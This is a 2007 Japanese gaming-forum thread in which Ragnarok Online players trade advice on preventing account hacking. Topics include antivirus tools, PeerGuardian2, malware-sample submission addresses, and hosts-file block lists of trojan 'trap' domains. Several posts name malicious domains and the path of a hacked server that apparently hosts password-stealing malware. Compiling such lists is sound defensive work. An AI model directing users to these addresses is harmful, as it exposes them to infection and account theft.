(○口○*)さん<>sage<>07/11/18 18:10 ID:4BiHKW1i0<> >>603
ハッカーにはちゃっかり抜け道を見つけられて、単にネットが使いにくくなるだけになりそうな… <>
(○口○*)さん<>sage<>07/11/18 18:12 ID:DeUBP4QF0<> >>603
韓国の状況や、FF11での住所盗用を見る限り、乗っ取りが多発するだけの希ガス。
それこそ、バイオ認証必須にでもしない限り、根本的対策としては無理がありそう。 <>
(○口○*)さん<>sage<>07/11/18 18:45 ID:9UKW6vVs0<> >>603
そんなことしたらアカハックなど比較にならない被害が出るな <>
(○口○*)さん<>sage<>07/11/18 23:09 ID:5mPNfkPM0<> >>605
thx. PC買い替えを機に、PG2も入れてみるよ。 <>
(○口○*)さん<>sage<>07/11/19 17:16 ID:KtjQYVPY0<> アカハック対策スレの方の>>937、くってかかる気持ちはわかるがちょっとガラが悪すぎる。
ああいう感じだと参考に見に来た人の気分を害して、以後見たく無くなるからもうちょっと落ち着こう。
毎日やれとかもさすがに言い過ぎ。 <>
(○口○*)さん<>sage<>07/11/19 17:36 ID:w5vpFyYM0<> スルーや放置されているよりはマシじゃない?いぢめ過ぎだとは思うけど。
で、方針とかどうしよう?あちらを完全に相談窓口スレにしちゃってこっちを
対策や情報収集・技術討論専用にしちゃうとかいうのが明快かも。肉般若風?
ログが残らない点に関してはこっち側もRagnarok板に移してもらえばよいし。
最近は奴らもFF11にシフトしたのかこっち側は平和になっていて
スレの進行もゆっくりだからなー。 <>
(○口○*)さん<>sage<>07/11/19 17:59 ID:gYmqsGCz0<> 毎日やれというのはアレだがWindowsUpdate放置とかバカノキワミに違いないからなあ。 <>
(○口○*)さん<><>07/11/19 18:52 ID:4ANYG3El0<> 統合してこのスレは廃止でおk <>
(○口○*)さん<>sage<>07/11/20 10:29 ID:yfE40Xvr0<> あっそ <>
(○口○*)さん<><>07/11/20 15:08 ID:9Lmjj3m10<> カスペの設定かえねーとROできねぇ('A`) <>
(○口○*)さん<>sage<>07/11/20 15:22 ID:67Rh7IjN0<> >>615
情報提供は具体的にどうぞ <>
615<>sage<>07/11/20 15:28 ID:9Lmjj3m10<> >>616
ワールド選んでパス入力後、ファイアウォールのRAGEXE.EXEが更新されてますで
許可しても不正更新されましたで永遠ループ状態に陥ってる <>
(○口○*)さん<>sage<>07/11/20 15:29 ID:Iz1+osGr0<> 告知にあったけど、癌公式
>▼アカウントハッキングについて
> ttp://www.ragnarokonline.jp/playguide/hacking/
癌にしては、可もなく不可もなく、という感じの内容に纏まってる。
悪く言えば毒にも薬にもならない、だけど。
ハクの主流がFFに移ったようにも見えるこの時期に、こういう啓蒙運動ってのは
ちょっと手遅れだった気がするが、対応窓口を明記したのは良い事かも。 <>
(○口○*)さん<>sage<>07/11/20 17:23 ID:lQ5wt7Zk0<> 逐一読んでみると「癌呆にしては」中々細かく書いてあると思った。
「キャラスロ全部埋めとけ」なんていう小手先レベルのことまで書いてあってちょっと笑った。
まぁ、遅すぎるのには同意だけどね…… <>
(○口○*)さん<>sage<>07/11/20 18:44 ID:bhw2tLUw0<> GMになりすましてID/PASSを聞き出す箔法が盛んだった頃に
垢箔で警察沙汰になれば癌的にも無駄手間が増えるのだから啓蒙ページ作れって
要求したんだけど本当に今更すぐるwww
でも、ないよりはマシだからそこは評価する。-100から-30くらいになった。 <>
(○口○*)さん<>sage<>07/11/20 19:43 ID:9ZqzrkeT0<> 内容そのものは、既出情報の纏めに過ぎないとは言えど、オフィシャルサイトに掲載されたことが重要ではある。
恐らく、IPA/ISECやら国セン、或いは警視庁といった公的機関からの釘刺しがあっただろうね。所謂行政指導に類するものが。
細かい点だが、表記に問題があるところを挙げてみると、
>「nProtect」は、ラグナロクオンライン専用に作られており、
これは事実誤認を起こす可能性がある。あくまで、nProGGのROカスタムバージョンなのだから。
ラグナロクオンラインで使用している「nProtect」は、ラグナロクオンライン専用に〜
くらいに修正すべきかも。 <>
(○口○*)さん<>sage<>07/11/20 19:54 ID:aVuhvHdk0<> RO起動した状態でFEやパンヤ起動すると、nProがすでに起動してます。
ってでるしな。 <>
(○口○*)さん<>sage<>07/11/20 19:56 ID:vFlpybxL0<> ・垢ハクに注意!
・RMTダメ!ゼッタイ!
なローディング画面が本日追加されてて思わずクスリとしてしまった。
WindowsUpdateのURLくらい貼ってもいいんじゃね?とも思ったが
さすがに過剰対応なんかな。
「Microsoft社にお問い合わせください」という文言にややもにょ……
メーカー製PCだと問合せ先はメーカー先……まぁ
細かい男は嫌われるか。 <>
(○口○*)さん<>sage<>07/11/20 21:04 ID:RZ6OLoST0<> なんで垢箔啓蒙ページだけ「ユーザー」じゃなくて「お客様」なん?
癌にお客様呼ばわりされて自分ドキドキなんですけど><* <>
(○口○*)さん<>sage<>07/11/20 21:06 ID:9ZqzrkeT0<> >>623
更に細かくすると、メーカー製PCでも、OEMプリインストールをそのまま使用していれば、サポートはベンダーだが、リテールパッケージの
OSを入れ直せばM$直接サポート(ポイント制)、DSP形態で入れ直せば販売店、VL版を入れたならM$直接サポート(有償)。
此処まで細分化されてしまうな。MSDNやEmbeddedは一般的でないので省略した。
それと、WU関連については、一般的なユーザー、要はWUサイトでExpress installを選択するような層に対してなら、
システムプロパティで自動更新にセットする設定を促すアナウンスで十分かと。
それ以外の追加インストールコンポーネントは、ある程度明確な目的を持って選択すべき物が多いし。 <>
(○口○*)さん<>sage<>07/11/20 21:18 ID:nOYwEmQX0<> typoの恐怖、タイポスクワッティングの現実が明らかに
ttp://dailynews.yahoo.co.jp/fc/computer/security_and_encryption/ <>
(○口○*)さん<>sage<>07/11/20 22:30 ID:8KgYHIn60<> ああ、でも。
先日うちの鯖のランカーホワイトスミスさんも垢ハクあって
製造依頼中止になってたし
本当にいまさら <>
(○口○*)さん<>sage<>07/11/21 00:43 ID:zygOLCIx0<> ランカーの垢ハックは、違う方面で疑ってしまう。 <>
(○口○*)さん<>sage<>07/11/21 01:05 ID:fG84Uxdj0<> 白黒はここで語るべき話題ではないからおいといて。
せめて、ゲーム内に傾ける情熱のうち僅かでも、情報収集に回していれば防げた可能性がある訳で。
何というか、アンテナが低いとか、必要な方向に向いていないと云ふべきか。 <>
(○口○*)さん<><>07/11/21 09:47 ID:LbAPPhd80<> そもそも垢ハク喰らう香具師てほいほいと貼られたURLを安易に開きすぎだと思うんだよw <>
(○口○*)さん<>sage<>07/11/21 11:01 ID:sk9Em/rI0<> 今の垢ハックはそういう次元じゃない。
一般サイトがクラックされて仕掛けられている以上、
前のITmediaや価格comのようにいつも見に行くニュースサイトなどが仕掛けられる可能性もある。
アップデートして無いとかPG2入れてないとかはセキュリティ甘いと言えばそれまでではあるが。 <>
(○口○*)さん<>sage<>07/11/21 11:02 ID:FtquHvzq0<> ランカーWSで垢ハクにあうとか自己防衛力低すぎだろ・・・
BSテンプレってRO関係Wikのi垢ハク対策の本拠地?じゃねっけ <>
(○口○*)さん<>sage<>07/11/21 11:56 ID:+QdUEhcf0<> 自分には関係ない、自分は平気、と根拠のない自信に満ち溢れてたんじゃない?
或いは変なツールとかに手を出したとか。 <>
(○口○*)さん<>sage<>07/11/21 18:01 ID:oyXXe9qI0<> ランカーとか関係ないような気もするが・・・ <>
(○口○*)さん<>sage<>07/11/21 19:28 ID:7KJSSwXl0<> 妬みの対象であり「ザマァw」という感情が込められてるだけだろうな <>
(○口○*)さん<>sage<>07/11/21 21:52 ID:CM/xuoGf0<> アカウントハック総合対策スレからきました。
livedoorしっかり汁! <>
(○口○*)さん<>sage<>07/11/22 08:59 ID:k9dJX1qrO<> nProのガクガク現象について問い合わせても「セキュリティ切れ」ってテンプレよこすくせに『垢ハックに注意!』とは笑わせる
ロード画面みるたびにイライラするんだが <>
(○口○*)さん<>sage<>07/11/22 09:06 ID:aOy7DGGf0<> 別のスキンを利用し、ローディング画像を差し変えてもセキュリティ的に問題はありません。w <>
(○口○*)さん<><>07/11/22 16:01 ID:/Yri3ETF0<> loading00.jpg〜04.jpgを好きな画像にすれば宣伝出て来ないんだっけ? <>
(○口○*)さん<>sage<>07/11/22 16:35 ID:dxhLN+zx0<> キモイジェットストリームアタックの頃にロード画面変えたから
宣伝画面なんざ更新されてても気付かねー <>
(○口○*)さん<>sage<>07/11/22 17:09 ID:YfA/5kqj0<> 画像差し替えの話になると流石にスレ違いだな。
それと 圧縮解凍ソフトのLhaplusにまた脆弱性が見つかった。
>「Lhaplus」に再びバッファーオーバーフローの脆弱性、修正版のv1.56が公開
>ttp://www.forest.impress.co.jp/article/2007/11/22/lhaplus156.html
前回はARJ形式だったけど、今回はLZH形式。
利用者はVer1.56に更新する事を強く推奨。 <>
(○口○*)さん<>sage<>07/11/22 20:39 ID:r7G6/9D/0<> 流れをぶった切って追加まとめな人です。
試しに作ってみました。
ttp://sky.geocities.jp/ro_hp_add/
突っ込みあればよろしくお願いします。 <>
(○口○*)さん<>sage<>07/11/22 20:55 ID:CMaMhj7T0<> >>642
乙彼!
追加部分は別にTextファイルでもアップしておけばプログラムやScriptに親切
(HTML変更で対応できなる、という問題が無くなる)なので、可能ならそれも
やってみてはいかが?
あとは、本家まとめさんのぶんと統合したバージョンのTextファイルも有ると
色々便利かと(Scriptを複数にアクセスさせたり、複数のタイプのHTMLを
解析しなくても良くなる)。多少本家さんに悪い気もしますが、でもその方が
本家さんのほうも寧ろ気が楽になると思います。 <>
(○口○*)さん<>sage<>07/11/22 21:10 ID:CMaMhj7T0<> 後、本家まとめと多少はデザインを変えた方が良いかと。一部のリンクが本家を
参照していますが、デザインが似通っている為どこからどこまでが本家サイトなのか
追加サイトなのかアドレスバーを見ないと分からなかったりします。無用な問題を
起こしかねないかもしれません(追加サイトへの意見を本家の方に送ってしまったり、とか)。
ま、URL&アドレスバーの確認はネットでのセキュリティの基本ではありますけどね。 <>
(○口○*)さん<>sage<>07/11/22 22:23 ID:aOy7DGGf0<> 今、カスペの体験版が30日じゃなくて、45/60/90日使えるキャンペーンやってるな。
スロット面倒くさいけど(ずるすんなよw)60日までは、頑張ってればそれなりに出る。
90日は出すの諦めた。
http://www.just-kaspersky.jp/preview/trykaspe/
NOD32の更新時期だから、これ使った後に乗り換えてみるかな。 <>
642<>sage<>07/11/22 23:18 ID:r7G6/9D/0<> >>643-644
とりあえず全体を灰色ベースでまとめてみました。
あと画面下部のほうに追加分についてはテキスト形式でも配置しました。
サイト自体はアカウントハック対策やhostsについて
利用するユーザーの手で理解して確認追加してほしいので
判りやすい先方を紹介しつつあのような形を取ってみました。
本家まとめさんの分と統合したテキストについては
上のような理由があって、
申し訳ないのですがとりあえず様子見という事で…。 <>
(○口○*)さん<>sage<>07/11/22 23:45 ID:CMaMhj7T0<> >>646
いえいえ、乙彼です。
あと、完璧を期するならば、BSWikiさんところのリスト(http://smith.rowiki.jp/files/riskystr.pl-latest.gz)
もチェックして漏れが無いか確認しても良いかもしれませんね。物によってはリネージュ資料室さんにも
本家まとめにも、このスレにも出てないっぽいドメインも有るようです(例 659889■com)。独自収集なの
かしらん?HTML形式やCSV形式になっている物もあるのでそれらを使えばピックアップ処理は楽かも?
http://smith.rowiki.jp/files/vir-domain_lookup.csv.gz
http://smith.rowiki.jp/files/vir-domain_lookup.html.gz
応援してまっせー。 <>
(○口○*)さん<>sage<>07/11/23 00:31 ID:P4voIhud0<> こんな物を発見。
"Leaky Too"
「ごく簡単なコードでほぼ全てのパーソナルファイアウォールソフトを
突破できることを明らかにしたリークテスト。
市販セキュリティソフトがPC上のファイル内容を
容易に漏らしてしまう脆弱性を検証することができる。」
ttp://www.vector.co.jp/soft/win95/util/se243670.html
Original Leak Test - LeakyToo
>これはいかにパッケージファイアウォールソフトが
>脆弱かということを知ってもらうために用意したものである。
ttp://www.geocities.jp/bruce_teller/security/leakytoo.htm <>
648<>sage<>07/11/23 00:32 ID:P4voIhud0<> 私は見事に表示されました。 <>
(○口○*)さん<>sage<>07/11/23 02:05 ID:HYYxwbkz0<> >>646
> 127.0.0.1 techlife■com
> 127.0.0.1 www■techlife■com
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1185352481/420
techlife■com■tw のミス (.com.tw は日本の .co.jp に相当。つまり日本のはcomの略)
> 127.0.0.1 5188■om
> 127.0.0.1 www■5188■om
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1185352481/642
om…オマーン?qq5188■comとちゃいます?
> 127.0.0.1 ameblo■jp
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1185352481/656
http://ameblo■jp/eisu7/は恐らく無害。フレームで呼び出され偽装に使われているだけの
善意の第三者のサイトだと思う。 <>
(○口○*)さん<>sage<>07/11/23 02:46 ID:HYYxwbkz0<> >>648
そこで紹介されているのは別に"新奇"な脆弱性というわけではなく、極当たり前の事
(信頼しているEXEを介するなら当然通信は許可されていまうべさ)を述べているだけですね。
ただ、盲点になりやすい事、というべきか。ここまで来ると一般的なFWでは専門外で
PG2のようなフィルタリングやアンチウイルスソフトの扱う領域だろうね。
>>646
BSWikiさんと事の漏れチェックが大変だったら、BSWikiさんとこに問い合わせてみれば?
結構色々やってそうだから助言してくれるかもしれません。
あと、
http://acopri.rowiki.jp/index.php?hostsRenewScript#v130b8ec
に沿うような記述法報を心がければhostsRenewScript で読み取り出来るようにする事が
可能かもしれませんね。私はそれつかってないんで分かりませんけど。 <>
642<>sage<>07/11/23 03:47 ID:0/p7p2lC0<> >>650
ご報告本当にありがとうございます。早速修正しました。
早いうちに訂正出来てよかったです。
>>647
自分は総合対策スレを見ていて自分用にまとめていたのを試しに…
といった流れだったので把握できない所もたくさんあると思います。
サイトを管理するとなると、
そういった穴も出来るだけ埋めないとってなりますね…。
現状その穴はBS-Wikiさんので対応してもらう他ないのですが、
出来る限り早いうちに漏れが無いか確認できればと。 <>
642<>sage<>07/11/23 03:56 ID:0/p7p2lC0<> >>651
なるほど…とりあえず色々考えてみようと思います。
自分はスクリプトのほうは使えない人なので、
でも対応できるならとも思いますが。
今はその他の事もあるので申し訳なく寝かせてください…。 <>
(○口○*)さん<>sage<>07/11/23 23:17 ID:f3bFXDBb0<> さすがのライブドアもWikiには一部フィルタリングを始めたみたいだな、
次々取得してる現状じゃ効果はないだろうが。
【荒らし行為をしているIPをブロックしました。】
http://wiki.livedoor.jp/livedoor256789/d/%b9??%b9??%f2%a4%b7%a4?%a4%a4%ebIP%a4%f2%a5?%ed%a5?%af%a4%b7%a4?%b7%a4%bf%a1%a3?wiki_id=4397
それを察して早速確認された新罠ID
mizunaooxm
Wikiだけじゃなくて、ブログとかフレパもやんないとダメだろうな。 <>
(○口○*)さん<>sage<>07/11/24 17:27 ID:5isE9imd0<> hostsRenewScript使って簡単にデータチェックしてみた。
件数はエディタの行数でカウントしただけで、厳密に調べてないので参考までに。
-リネ資料室:910件
-まとめサイト:468件
-まとめ臨時:142件
--上記3サイトの重複カット後の件数:969件
-BSWiki:1064件
※うち1件ダブりあり+1件処理ミスっぽいのあり
ragnarox■mobiが二重入力で処理されてる感じ
--上記4サイトの重複カット後の件数:1174件
-件数のズレの理由
--情報入手元の違い
--「www」を付加してる・してないの差がある
--安全なドメイン・消滅したドメインがリストから除外してる場合がある <>
(○口○*)さん<>sage<>07/11/24 18:34 ID:LC0HxOd/0<> http://qb5.2ch.net/test/read.cgi/saku2ch/1176325525/4
4 名前: かずたろー 投稿日: 2007/11/24(土) 17:21:27 HOST:OFSfb-20p3-234.ppp11.odn.ad.jp
リネージュ RMT
http://www■rmtfane■com/lineage
2chの削除要請板で発見。
「OFSfb-20p3-234.ppp11.odn.ad.jp」でぐぐるといろんなところに書き込みしている模様。
踏み台にでもされてるのかなあ? <>
(○口○*)さん<>sage<>07/11/24 18:39 ID:LC0HxOd/0<> 656追記。
gameの名前がついているスレにマルチポストしている模様。
削除整理板にも書き込んでいるのを確認。 <>
(○口○*)さん<>sage<>07/11/24 18:41 ID:x0MdKi1D0<> OFSfb-(中略).ppp11.odn.ad.jpは昔から荒らしに使われている超有名なホスト <>
642<>sage<>07/11/24 20:18 ID:pwtNiW4t0<> >>655
BS-Wikiさんのriskystr.pl-latest.gz拡張子を
txt(MS-DOS形式)にして保存。
\を除去、手作業でチェックし始めてみました。
riskystr.pl-latest.gzファイル内の
###---RO:domain---###が終了時点で35件中12件と、
初っ端から本家まとめさんと臨時分を合わせたリストには無い物が‥。
無作為にCRACK:domain、SERVICE:domainのリスト部分で検索すると
殆ど引っかからなかったりします。
LINE:domain(リネージュ研究室のリスト?)の行になると重複しているようですが
その下にあるTRANS:domainの行になると引っかからない状況のようです。
とりあえず重複分を一つ一つ検索で潰していくしかないのかもしれません…。 <>
(○口○*)さん<>sage<>07/11/24 21:06 ID:5isE9imd0<> >659
正直何をやろうとしてるのかが見えないけど……
リネ資料室+まとめサイト+まとめ臨時(スレ報告分)とBSWikiの
リストを比較して差分を出したいだけ?
それとも4サイトに上がっているhostsの統合版を作るのが目的?
まとめサイトもそうだったけど、スレに上がった分の取り纏めだけで
十分だと思う。
それと、>651にも書かれてたけど、リストのヘッダフッタにそれぞれ
「# Trojan trap sites」と「# End of trojan trap sites」の1行があると
hostsRenewScript使う場合に利用出来るので、ご一考を。 <>
642<>sage<>07/11/24 22:07 ID:pwtNiW4t0<> >>660
スクリプトの説明をしっかり読んでいなかったので
例のヘッダフッタの事を把握していませんでした。申し訳ないです。
さっそく表とテキスト版に入れました。
これでうまく動作できるといいのですが。
>>659で何をしていたかというと、
>>647で上げられているように穴が無いかなと思い、
自分の所で使用しているのは、まとめサイトと臨時(スレ報告分)を合わせたものです。
それで今BS-Wikiさんで上がっているriskystr.pl-latest.gzファイルと比較して
自分のリストに載っていない差分が出せれば、
穴も埋められるかなと安易に思ってやってみました。
結果としては統合版?になるのでしょうか…?
今まで通りの纏めでも問題なければ、こちらも楽に。 <>
(○口○*)さん<>sage<>07/11/24 23:43 ID:5isE9imd0<> >661
更新乙です。
hostsRenewScriptで読み込める事を確認しました。
BSWikiのリストとのチェックについてですが、前スレ537で
hosts.sample.gzについて、BSWikiの人のコメントがあります。
(トリ無いけど内容から判断してBSWikiの人と判断)
長くなるので引用しませんが、あくまで参考データとしての活用を
望んでると思われます。
統合版はあれば楽でしょうけど
>646
>利用するユーザーの手で理解して確認追加してほしいので
これが念頭にあるなら、用意するのはどうかな、と言う気も。 <>
437:中間報告<>sage<>07/11/25 23:01 ID:xuEztkuq0<> >>437,>>507 です。
現在Kaspersky試用版を試していますが、
これは色々な意味で強力ですね。
でも強力過ぎて使いこなせそうに無いです。FW関係で苦戦中。
例えばOPERA 9.24 がまともに動かない。
アプリケーション別の設定は既にして有るのに、
単にWEBページを表示するだけでも
なぜか一々メッセージウィンドウが出て許可しなくてはならない。
「OPERAは全部の通信を許可」に設定しても
HTTPSのWEBページは(TCP443)やっぱりウィンドウで許可を求められる。
FW機能をOFFにしたらまともに動く様に。でも意味無いよ!
もう少しあがいてみますが、私の手に余る様なら、
「NOD32 + ZoneAlarm フリー版」という形になるでしょう。
フリー版とはいえ、入れてないよりはマシでしょうから… <>
(○口○*)さん<>sage<>07/11/25 23:10 ID:W1fuC8T10<> 海外のMMORPGレベル上げ代行サイトなどがウィルスに感染
ttp://www.4gamer.net/games/042/G004287/20071122053/
ゲーム関連サイトに危険な“わな”、パスワードを盗まれる恐れ
ttp://itpro.nikkeibp.co.jp/article/NEWS/20071122/287810/
レベル上げ代行サイトが食われたっつーのは本音を言うとグッジョブだ <>
(○口○*)さん<>sage<>07/11/25 23:22 ID:LsC4T/Fw0<> >>663
ホスト単位でいちいち許可設定してるからだろ・・・ <>
437,663<>sage<>07/11/25 23:56 ID:xuEztkuq0<> >>665
>ホスト単位でいちいち許可設定してるからだろ
いくら何でもそれはして無いと思うのですが…
ttp://chu.s3.x-beat.com/cgi-bin/kick/img_box/img20071125235039.gif
「443をホストごとの設定」が左上。
「443を全ホスト全部許可」が右上。
「TCPは全ホスト全部許可」が左下。ですよね?
「TCPは全ホスト全部許可」の優先順位が一番上なので、
これでまともに表示出来ると思ったのですが
結果は >>663 の通りです。
FIREFOX や IE6SP1 は
こんな「TCPは全部許可」設定を入れ無くても
ちゃんと動くんですが。 <>
(○口○*)さん<>sage<>07/11/26 00:16 ID:ix9QJJRS0<> >>663
NOD32+FWのESET Smart Securty ってのもあるんだぜ。カスペの方がいいと思うが。 <>
(○口○*)さん<>sage<>07/11/27 10:38 ID:56owm9pC0<> PG2の許可リストに>>2にあるRO許可リストを追加しようと思うのですが、
やり方は、
メモ帳にRO許可リストをペーストしてtxtファイルとして保存
↓
PG2のリスト管理の「追加」で種類を「許可」として上のファイルを指定し追加
でいいのでしょうか? <>
(○口○*)さん<>sage<>07/11/27 13:35 ID:d4QKfc8j0<> >>668
おk
−−−−−
総合スレより移動
>10 (^ー^*)ノ〜さん New! 07/11/27 13:18 ID:Rl5H0P0a0
>PeerGuardian2を導入して
>リネ2やったんですけど「222.231.15.60」
>というアドレスに送信してて、それをブロックしてる
>これってやばいですか?
そのIPがどこだかはaguse等で確認しましょう。韓国のIPですね。
http://www.aguse.net
http://antispam.stakasaki.net/tools/spamclaim-tools.html
222.231.15.60:
[ ISP Organization Information ]
Org Name : LG DACOM KIDC
Service Name : KIDC
Org Address : Nonhyun-dong, Kangnam-gu
Org Detail Address: KIDC, 261-1
リネ2に関係しているアドレスかどうかはわかりません。
ブロックしたままでプレイに支障がなければ気にする必要はありません。
なにかの不都合が出る(パッチが当たらない等)の場合に解除する形ですね。 <>
668<>sage<>07/11/27 13:54 ID:56owm9pC0<> >>669
ありがとうございます。 <>
(○口○*)さん<>sage<>07/11/27 18:52 ID:vZtcL7ns0<> http://www.ragnarokonline.jp/news/information/notice/item/10342
>パケットの暗号化 2008年6月までに実施予定
>不正接続への対策(ゲームサーバー) 2008年6月までに実施予定
>不正接続への対策(アトラクションセンター) 2008年6月までに実施予定
こりゃまたRO狙いが戻ってくるんじゃないかね。 <>
(○口○*)さん<>sage<>07/11/27 20:10 ID:Q1U2bwtC0<> >>671
戻ってくるということは無いと思う
今まで対策がされてなかったという事だから、対策が原因で離れていた「RO狙い」が居ない
対策もされずに離れたとしたら旨みがなくなったからだから不正対策が延期になっても戻ってこないでしょ <>
437,663<>sage<>07/11/27 21:26 ID:5k5evpUR0<> >>667
>NOD32+FWのESET Smart Securty ってのもあるんだぜ。
カスペの方がいいと思うが。
情報ありがとうございます。これも試用版があるんですね。
後で試してみようと思います。
現状、Kasperskyは高性能に振り回されてるといいますか、
運転免許すら持って無いのに
いきなりレーシングカーに乗せられたような気分なので(汗) <>
(○口○*)さん<>sage<>07/11/28 10:46 ID:Iq/kqaFO0<> 新しいセキュリティソフト発売されたみたいね
謳い文句は良いけどどうかねぇ
世界最高水準の検出率、快適ウイルススキャン、ステルスウェア検出、
安心オンラインゲーム等の新機能搭載ジーデータのセキュリティ対策ソフト 発売
ttp://software.transdigital.co.jp/press/news2007/20071029gdata.htm <>
(○口○*)さん<>sage<>07/11/28 11:34 ID:s3lKHkT30<> >674
G DATAは昔どこかで見たと思ったら、日経トレンディネットのインタビュー記事だった。
ttp://trendy.nikkeibp.co.jp/article/col/20061215/120227/
ttp://trendy.nikkeibp.co.jp/article/col/20061215/120228/
前Verの「G DATA InternetSecurity 2007」では、カスペとAvast!のエンジンを搭載。
多分、2008も一緒だろう。
個人的には販売元がサイバーリンクというのが気になるけど。 <>
(○口○*)さん<>sage<>07/11/28 12:03 ID:UF/N5rdS0<> レッドワクチン:1時間に1回定期更新を行い、広範囲に効力のある高機能なシールド
イエローワクチン:不定期に更新を行い、亜種に強いシールド
このレッドってやつがカスペの定義だろうな
1時間に一回なんてカスペでなければ出来ない芸当だし <>
(○口○*)さん<>sage<>07/11/28 14:47 ID:aU2YBhs60<> 検体提出先追加
VirusDoctor <labo@virusdoctor.jp>
検出率とかの評判見ても散々だから、使ってる人いないとは思うけど、
まとめて検体提出のメール出す分には手間かからないので追加しとく。
http://www.virusdoctor.jp/
ROセキュリティWikiの検体提出先のページには反映済み。 <>
(○口○*)さん<>sage<>07/11/28 17:53 ID:VE7WQ/8K0<> ライブドアの福建人ども、今日も改竄をしたい放題。
ライブドアの対策というのも口だけだったか。
爆撃されてるWikiを回ってみても全く改善している様子が無い。
改善したのはその間に管理者が編集制限をかけたところだけだな。
ID削除するつもりもIPブロックするつもりも無いって事か。
Wiki管理者に直接メールを送ってるみたいだけど、これが”対策”の正体なのかも。
ライブドアサービス(Wiki、ブログ、フレパもか)はもう危険だな。
罠IDはてんこ盛り、ブログやWiki作ったら即爆撃目標マークが付きそうだ。
爆撃目標がゲーム以外にも伸びてるから事実上サービス内無差別爆撃。 <>
(○口○*)さん<>sage<>07/11/28 17:53 ID:g9QEXbgm0<> http://gemma.mmobbs.com/test/read.cgi/ragnarok/1185352481/990n-
対策スレ8の990,993、caremoon■net も同じIPです。要注意。 <>
(○口○*)さん<>sage<>07/11/28 21:43 ID:Y7tmjSe90<> >>677
ああ、そこはjiangminに直接送ってる。
あとテクノロがまた食われた模様。 <>
(○口○*)さん<>sage<>07/11/28 22:08 ID:aU2YBhs60<> >>680
中国のサイトから探すの面倒になったので、諦めたwww
jiangminのアドレスあったらセキュWikiの一覧更新しといて。 <>
(○口○*)さん<>sage<>07/11/28 22:33 ID:Y7tmjSe90<> 多すぎてめんどくさくなったw
AVIRA AntiVir analysis.avira.com
ドクター(jiangmin) virusあっとjiangmin.com
キラー(rising) up.rising.com.cn
キング up.duba.net
アンラボ kr.ahnlab.com/info/customer/html/virus_call.html 下の鉛筆
ハウリ hauri.co.kr/support/service/virus_reg.html <>
(○口○*)さん<>sage<>07/11/28 22:39 ID:Y7tmjSe90<> FF11のアカハックスレより。
http://live25.2ch.net/test/read.cgi/ogame/1195039193/571
中華によるサイトクラック警報
記事自体は567のと同じ、しかしリンクは日本の会社。
> 敢えて戦士でMaridにソロチャレンジ...ファイナルファンタジー FF11 ソロ
> 219■106■240■181/lib/smarty/internals/core■rmdir1■php
ホスト名 s05.tekunoro.co.jp
こりゃどう見てもクラック。
FFサイトでも対策され始めたんでいよいよハッカー雇ってクラックにうって出たか。
ROでは総合スレでかなり前に既出。
通報しても徒労に終わったことも既出。 <>
(○口○*)さん<>sage<>07/11/28 23:14 ID:aU2YBhs60<> >>682
せんきゅー。Wiki直しとくよ。
キングは、日本のフォームからで新種だとUSBメモリくれるから、日本からでいいやw
RisingとAVIRAはメールのが楽なんでそっちでいいし。
Hauri(ViRobot)
http://www.haurijapan.com/support/vreport01.php
http://hauri.co.kr/support/service/virus_reg.html
AhnLab(AhnLab-V3)
http://kr.ahnlab.com/info/customer/virus_call_write.jsp
キングソフトインターネットセキュリティー2007(キングソフト)
http://www.kingsoft.jp/support/is/kentai.htm
http://up.duba.net(CN) <>
(○口○*)さん<><>07/11/29 00:48 ID:wFZMvDGY0<> オンラインゲーマー優先のセキュリティソフト
ttp://www.mysaas.jp/
どうでしょう? <>
(○口○*)さん<>sage<>07/11/29 00:58 ID:r7or4SkT0<> >>685
どうでしょうと言われても…アンラボは、検出率悪い方かな。
最近は検体提出してるからある程度は対応してきてるけど。
実際に使っている人の報告あれば、そっちを信用してくれな。 <>
(○口○*)さん<>sage<>07/11/29 05:13 ID:L5B1KZco0<> 【 気付いた日時 】 一週間ほど前から
【不審なアドレスのクリックの有無 】 3回ほど発見、1回踏む
【 アドレス 】 mixiの足跡帳
【 OS 】 windowsXP
【使用ブラウザ 】 IE6.0
【WindowsUpdateの有無】 一週間ほど前
【 アンチウイルスソフト 】 無し
【その他のSecurty対策 】 Spybot
【 ウイルススキャン結果】ウィルスの発見はありませんでした
【テンプレの参考サイトを読んだか】 今から読みます
【hosts変更】無し
【PeerGuardian2導入】無し
【説明】
MIXIでROの日記等を書いていたり、RO関係のコミュニティに入っていたりする者なのですが
1週間ほど前から怪しいニックネームの足跡がつくようになりました。
『AUFZ』や『QUWF』などといった、アルファベット4文字の意味の無い文字列と感じられる
ニックネームの方です。1回目の足跡の時にダレだろう?と思い
相手のTOPページ(MIXIでプロフィールが乗っている画面)をのぞいてみたのですが
ニックネーム以外無記入で、相手のマイミクシィには似たようなアルファベット4文字の
人が1人だけ登録されていました。不審に思い、spybotでスキャンをしてみたところ
疑わしいファイルは発見されませんでしたが、ここ一週間で
似たような名前の人から何度か足跡がついています。(名前からして別IDのようです)
そこで質問なのですが・・・
『MIXIの相手のTOPページを踏んだだけでウィルスに感染する』という事はあるのでしょうか?
一応、Spybotで3日に一度はウィルススキャンをしているのですが
最近またアカウントハックが活性化しているようなので心配なので書き込ませていただきました。 <>
(○口○*)さん<>sage<>07/11/29 05:42 ID:+MR8rKMy0<> >>687
>『MIXIの相手のTOPページを踏んだだけでウィルスに感染する』という事はあるのでしょうか?
これはないかと
>1週間ほど前から怪しいニックネームの足跡がつくようになりました。
mixiは捨て垢でヲチする方もいるようなのでそれではないでしょうか?
しっかりとしたウイルス対策ソフトは導入したほうがいいですよ
Spybotはあくまで補助で使うのがいいかと思います
Spybotで検出無しということですが、>>2のカスペオンラインスキャナでも調べてみましょう <>
(○口○*)さん<>sage<>07/11/29 06:02 ID:XGBTHihB0<> >>687
多分、mixi用spambotの実行を目的としたアカウント。
一応、この辺で解説されている類いかと。
ttp://julajp.blog53.fc2.com/blog-entry-317.html
ttp://e0166.blog89.fc2.com/blog-entry-207.html
FC2が不安だったら、はてなブックマークのURLでも。
ttp://b.hatena.ne.jp/entry/http://www.mixiwizard.com/ <>
(○口○*)さん<>sage<>07/11/29 07:26 ID:Ef91BEka0<> >>687
mixiではID制限が出来るので気になるようならソレを利用してみては?
足あとに残っているニックネームを右クリック、プロパティで
IDを拾うことができる筈なので、それで様子を見てはいかがでしょうか?
あとこれを機会にウイルス対策やPG2やhosts対策をするとベター。
それらを使う場合でも本人が気をつけないと意味が無かったりしますが
